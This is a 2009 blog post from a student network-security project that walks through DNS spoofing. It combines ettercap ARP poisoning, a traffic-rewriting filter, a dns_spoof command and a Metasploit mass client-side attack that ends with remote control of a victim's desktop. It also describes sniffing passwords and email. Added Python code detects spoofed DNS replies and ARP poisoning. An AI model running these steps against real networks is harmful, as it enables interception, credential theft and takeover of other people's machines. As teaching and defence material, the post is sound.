DNS Spoofing: The Basics to Advanced

on Wednesday, May 6, 2009
INTRO
I did a lot of research for my tiny network security project group on this topic, while the other groups just presented basic security... So here we start from the basics.

First you need to know what DNS is. I will try to narrow the scope: DNS spoofing is a kind of modification attack, where we intercept the packet(s) in transit and change them to whatever we want. If you Google around, you will find that the basics of DNS spoofing can easily be learned and practised using ettercap. You should be able to grasp the basics using this howto.
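An added example (my code, not from this post or from ettercap) that parses a DNS reply in wire format and flags the two things a poisoned answer in the setup below shows: a reply whose transaction ID is not the one we sent, and a public name resolving to an address inside our own LAN. The 164.0.3.0/24 subnet and the 164.0.3.10 answer are constructed from the addresses used later in the post; the irongeek.com address is the one from the nslookup output further down.

```python
import ipaddress
import struct

def build_response(txid, name, answer_ip, ttl=60):
    """Constructed sample input: minimal DNS reply with one question and one A record."""
    qname = b"".join(bytes([len(p)]) + p.encode() for p in name.split(".")) + b"\x00"
    return (struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)      # header: response, QD=1, AN=1
            + qname + struct.pack("!HH", 1, 1)                    # question: type A, class IN
            + b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4)    # answer owner = pointer to offset 12
            + ipaddress.IPv4Address(answer_ip).packed)

def _read_name(pkt, off):  # walk labels, follow a compression pointer -> (name, next offset)
    parts = []
    while True:
        n = pkt[off]
        if n == 0:
            return ".".join(parts), off + 1
        if n & 0xC0 == 0xC0:
            target = struct.unpack("!H", pkt[off:off + 2])[0] & 0x3FFF
            return ".".join(parts + [_read_name(pkt, target)[0]]), off + 2
        parts.append(pkt[off + 1:off + 1 + n].decode())
        off += 1 + n

def parse_response(pkt):
    """Return (txid, queried name, [A-record IPs]) for a reply with one question."""
    txid, _flags, _qd, ancount, _ns, _ar = struct.unpack("!HHHHHH", pkt[:12])
    name, off = _read_name(pkt, 12)
    off += 4                                                  # skip QTYPE + QCLASS
    ips = []
    for _ in range(ancount):
        _owner, off = _read_name(pkt, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:                         # A record
            ips.append(str(ipaddress.IPv4Address(pkt[off:off + 4])))
        off += rdlen
    return txid, name, ips

def spoof_indicators(pkt, expected_txid, lan_net):
    """Findings for one reply: an ID we never sent, or a public name answered from our own LAN."""
    txid, name, ips = parse_response(pkt)
    findings = []
    if txid != expected_txid:
        findings.append("reply id %#06x != query id %#06x" % (txid, expected_txid))
    findings += ["%s -> %s lies inside the LAN %s" % (name, ip, lan_net)
                 for ip in ips if ipaddress.IPv4Address(ip) in lan_net]
    return findings

LAN = ipaddress.ip_network("164.0.3.0/24")                          # subnet used in the walkthrough
GENUINE = build_response(0x1234, "irongeek.com", "208.97.169.250")  # matches the nslookup output
SPOOFED = build_response(0x1234, "google.com", "164.0.3.10")        # constructed poisoned answer
```

The LAN check is what step 8 of the walkthrough does by hand with nslookup; a real resolver monitor would also compare answers against a second, trusted resolver.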

If you install ettercap, it only provides the basics of the 'man in the middle' stuff. For advanced usage, try playing around with filters; an example is given here:

filter -->

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}

if (ip.proto == TCP && tcp.src == 80) {
   msg("in Second IF\n");
   if (search(DECODED.data, "Hello")) {
      replace("Hello", "12345");
      msg("run\n");
   }

   if (search(DATA.data, "Google")) {
      replace("Google", "GOOGLE HACKED");
      msg("run2\n");
   }
}


EXAMPLE

DAILY FUN


Now, where were we... OK. You can play around with ettercap together with Wireshark. It is really fun, because while you are poisoning a specific machine you are able to read any message or text it posts to the network using Wireshark (for example, the text I am writing here, LOL). That applies to private data such as usernames and passwords too; even basic ettercap is able to capture private email data. The most popular email used for testing is Gmail, not really sure why though. Other tools that you might be interested in are:

nslookup - look up the IP of a specific website

Note that you can get more data if you run nslookup with a specific IP (a reverse lookup), as in the second run here:

[ reez @ alexendeRReez : /home/reez/Desktop ] nslookup irongeek.com
Server: 10.0.7.254
Address: 10.0.7.254#53

Non-authoritative answer:
Name: irongeek.com
Address: 208.97.169.250

[ reez @ alexendeRReez : /home/reez/Desktop ] nslookup 208.97.169.250
Server: 10.0.7.254
Address: 10.0.7.254#53

Non-authoritative answer:
250.169.97.208.in-addr.arpa name = apache2-linus.lankershim.dreamhost.com.

Authoritative answers can be found from:
169.97.208.in-addr.arpa nameserver = NS3.dreamhost.com.
169.97.208.in-addr.arpa nameserver = NS1.dreamhost.com.
169.97.208.in-addr.arpa nameserver = NS2.dreamhost.com.



Nmap
- Network scanner

This might sometimes be just a simple vulnerability scanner, but at the same time it is really dangerous; there are many options provided:

[ reez @ alexendeRReez : /home/reez/Desktop ] nmap -help
Nmap 4.68 ( http://nmap.org )
Usage: nmap [Scan Type(s)] [Options] {target specification}
TARGET SPECIFICATION:
  Can pass hostnames, IP addresses, networks, etc.
  Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
  -iL <inputfilename>: Input from list of hosts/networks
  -iR <num hosts>: Choose random targets
  --exclude <host1[,host2][,host3],...>: Exclude hosts/networks
  --excludefile <exclude_file>: Exclude list from file
HOST DISCOVERY:
  -sL: List Scan - simply list targets to scan
  -sP: Ping Scan - go no further than determining if host is online
  -PN: Treat all hosts as online -- skip host discovery
  -PS/PA/PU [portlist]: TCP SYN/ACK or UDP discovery to given ports
  -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
  -PO [protocol list]: IP Protocol Ping
  -n/-R: Never do DNS resolution/Always resolve [default: sometimes]
  --dns-servers <serv1[,serv2],...>: Specify custom DNS servers
  --system-dns: Use OS's DNS resolver
SCAN TECHNIQUES:
  -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
  -sU: UDP Scan
  -sN/sF/sX: TCP Null, FIN, and Xmas scans
  --scanflags <flags>: Customize TCP scan flags
  -sI <zombie host[:probeport]>: Idle scan
  -sO: IP protocol scan
  -b <FTP relay host>: FTP bounce scan
  --traceroute: Trace hop path to each host
  --reason: Display the reason a port is in a particular state
PORT SPECIFICATION AND SCAN ORDER:
  -p <port ranges>: Only scan specified ports
    Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080
  -F: Fast mode - Scan fewer ports than the default scan
  -r: Scan ports consecutively - don't randomize
  --top-ports <number>: Scan <number> most common ports
  --port-ratio <ratio>: Scan ports more common than <ratio>
SERVICE/VERSION DETECTION:
  -sV: Probe open ports to determine service/version info
  --version-intensity <level>: Set from 0 (light) to 9 (try all probes)
  --version-light: Limit to most likely probes (intensity 2)
  --version-all: Try every single probe (intensity 9)
  --version-trace: Show detailed version scan activity (for debugging)
SCRIPT SCAN:
  -sC: equivalent to --script=default
  --script=<Lua scripts>: <Lua scripts> is a comma separated list of
           directories, script-files or script-categories
  --script-args=<n1=v1,[n2=v2,...]>: provide arguments to scripts
  --script-trace: Show all data sent and received
  --script-updatedb: Update the script database.
OS DETECTION:
  -O: Enable OS detection
  --osscan-limit: Limit OS detection to promising targets
  --osscan-guess: Guess OS more aggressively
TIMING AND PERFORMANCE:
  Options which take




ADVANCES

Enough with the crap... OK, let's see how I applied this in a real situation (my tiny network security project).

1. Open Ettercap
#ettercap -G
2. Go to option: Sniff -> Unified sniffing
3. Scan for hosts to get the list of machines connected to the LAN using option: Hosts -> Scan for hosts
4. Set the target; usually choose one IP as the victim IP and its DNS server, for example:
Victim's IP: 164.0.3.47
Server's IP: 164.0.3.254
5. Launch the MiTM attack, which is ARP (Address Resolution Protocol) poisoning.
6. Then compare the packet captures on the victim computer using Wireshark, taken before launching the
MiTM attack and while it is still occurring.
7. i) Edit the file, usually named /usr/local/share/ettercap/etter.dns
ii) Point the target URL to our IP address (the intent is to spoof, but as we are demonstrating a Mass Client-Side
Attack, we point the URL to the attacker's IP address).
Example:
google.com A
*.google.com A
www.google.com PTR
iii) Save and close the text file.
In the Ettercap GUI (Graphical User Interface), check the available plugins by clicking DNS
spoofing, or use the command line:
ettercap -T -q -M arp:remote -P dns_spoof //

8. Check the IP address using nslookup again; it will give different output compared to the initial
nslookup test done before starting the MiTM attack in the previous steps (cmd / Windows terminal),
as it should now point to the attacker's IP address.
9. This means that whenever the victim opens a browser and browses google.com, it will be redirected to the attacker's IP
address.
10. Open the Fast-Track application, which is listed under Penetration in the BackTrack operating
system.
11. At the Fast-Track shell main menu, choose option number 2: External Hacking. Then you
must select option number 7: Metasploit Mass Client-Side Attack.
12. Check the IP address using ipconfig (Windows) or ifconfig (Linux).
13. Next, enter the IP address for Apache and press the Enter key.
14. When the victim browses google.com, they are redirected to the attacker's IP address (step 9) and the
attacker starts the attack.
15. We have to wait until the Framework connects to the system. After that, we are able to remote into the
victim's desktop and modify anything we wish.
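An added check (my code, not from this post or from ettercap) for the ARP poisoning in steps 4 and 5: with -M arp:remote, ettercap answers for both the victim and the DNS server with the attacker's MAC, so on the wire the same MAC turns up behind two IPs and the server's entry flips. The reply stream and the MAC addresses are constructed; the two IPs are the victim and server from the walkthrough, and the optional baseline is assumed to come from a capture taken before any attack.

```python
from collections import defaultdict

# Constructed ARP reply stream as (sender IP, sender MAC) in arrival order. The MACs are
# made up; the IPs are the victim (164.0.3.47) and DNS server (164.0.3.254) from the post.
ARP_REPLIES = [
    ("164.0.3.254", "00:11:22:aa:bb:01"),  # genuine DNS server / gateway
    ("164.0.3.47",  "00:11:22:aa:bb:02"),  # genuine victim
    ("164.0.3.254", "00:11:22:aa:bb:99"),  # poisoned: attacker claims the server's IP
    ("164.0.3.47",  "00:11:22:aa:bb:99"),  # poisoned: attacker claims the victim's IP as well
]

# Optional known-good table (assumed to be recorded from a clean capture beforehand).
BASELINE = {"164.0.3.254": "00:11:22:aa:bb:01"}

def analyse_arp(replies, baseline=None):
    """Return alerts, in order, for: an IP whose MAC changes, a reply that contradicts the
    baseline table, and a MAC that ends up behind more than one IP (the arp:remote pattern)."""
    ip_to_mac, mac_to_ips, alerts = {}, defaultdict(set), []
    for ip, mac in replies:
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            alerts.append("%s changed from %s to %s" % (ip, prev, mac))
        if baseline and ip in baseline and baseline[ip] != mac:
            alerts.append("%s contradicts baseline %s" % (ip, baseline[ip]))
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:
            alerts.append("%s now claims %s" % (mac, ", ".join(sorted(mac_to_ips[mac]))))
    return alerts
```

On a switched network the usual mitigations are static ARP entries for the gateway and resolver on sensitive hosts, and Dynamic ARP Inspection on the switch; the alert list above is the input a monitor would feed to those decisions.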


I will explain the Framework in another post... so see you in the next post. You might want to Google around for other examples...

WooT!
